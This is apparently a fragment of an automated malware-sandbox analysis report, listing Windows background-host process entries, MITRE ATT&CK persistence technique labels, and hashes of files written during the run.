C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:1324
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:2020
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:668
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:4796
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize330B
MD561282d464b5c420051144e281ab8a6d3
SHA116f49ac38d27d2f51e0145e165b9a739722241e6
SHA256bfabd6c09669c4fce29686f3612c4c3286a7b22abb430416f58eb23109baf1f3
SHA512a21267a9c8d3041547774cd400af838b68346a5e09a575169925e2399e80d6b7f076edecd156a3c86c8ca86bf4ac28819ccd5e1fa17667ba758ce56fb92b14eb
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD5281570239792ee47c67dc2ebd2880e2d
SHA1da51d7bb17aab8b0697beb2e3811a26137a5fc23
SHA256ce9cbded4231c7c41e771493f57362b93d0428bc5ef1ddea719c02309bba61ae
SHA512d7c4fc0dc2baffefc5c93175c25af89dff537a39051b94d59da7b51c2d8bc8b69c4ec289f13d3ed1bc2ea4cea81aa626f08a9b169e1164845865f4293e39307e
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
409KB
MD5a0f5aa5764c4f66eee82f857f9f447b6
SHA13c3a780d020cb3eb3088223443fe813abb95dccd
SHA25643c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3
SHA512458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82